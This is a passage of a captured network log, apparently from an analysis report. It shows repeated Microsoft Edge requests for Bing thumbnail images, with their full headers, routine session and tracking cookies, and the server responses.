cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1952
cache-control: public, max-age=5184000
date: Wed, 04 Dec 2024 10:09:16 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306956.4050a77b
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OIP.TlKLzmlUDOQQQyei_8UCfgHaDt&w=80&h=80&c=1&vt=10&bgcl=162879&r=0&o=6&pid=5.1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OIP.TlKLzmlUDOQQQyei_8UCfgHaDt&w=80&h=80&c=1&vt=10&bgcl=162879&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1483
cache-control: public, max-age=1209597
date: Wed, 04 Dec 2024 10:09:16 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306956.4050a784
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.88390ebb-fd85-4b20-be65-a20d14bad498&w=32&h=32&qlt=93&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.88390ebb-fd85-4b20-be65-a20d14bad498&w=32&h=32&qlt=93&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1385
cache-control: public, max-age=1209600
date: Wed, 04 Dec 2024 10:09:16 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306956.4050a782
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OIP.TlKLzmlUDOQQQyei_8UCfgHaDt&w=80&h=80&c=1&vt=10&bgcl=35a6b6&r=0&o=6&pid=5.1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OIP.TlKLzmlUDOQQQyei_8UCfgHaDt&w=80&h=80&c=1&vt=10&bgcl=35a6b6&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1274
cache-control: public, max-age=1209600
date: Wed, 04 Dec 2024 10:09:16 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306956.4050a786
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=94&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=94&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2252
cache-control: public, max-age=5184000
date: Wed, 04 Dec 2024 10:09:16 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306956.4050a778
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OIP.lqYiQnLswjZsfE-FgdTFPgAAAA&w=80&h=80&c=1&vt=10&bgcl=49cb0b&r=0&o=6&pid=5.1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OIP.lqYiQnLswjZsfE-FgdTFPgAAAA&w=80&h=80&c=1&vt=10&bgcl=49cb0b&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1385
cache-control: public, max-age=1209600
date: Wed, 04 Dec 2024 10:09:16 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306956.4050a780
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=95&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=95&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
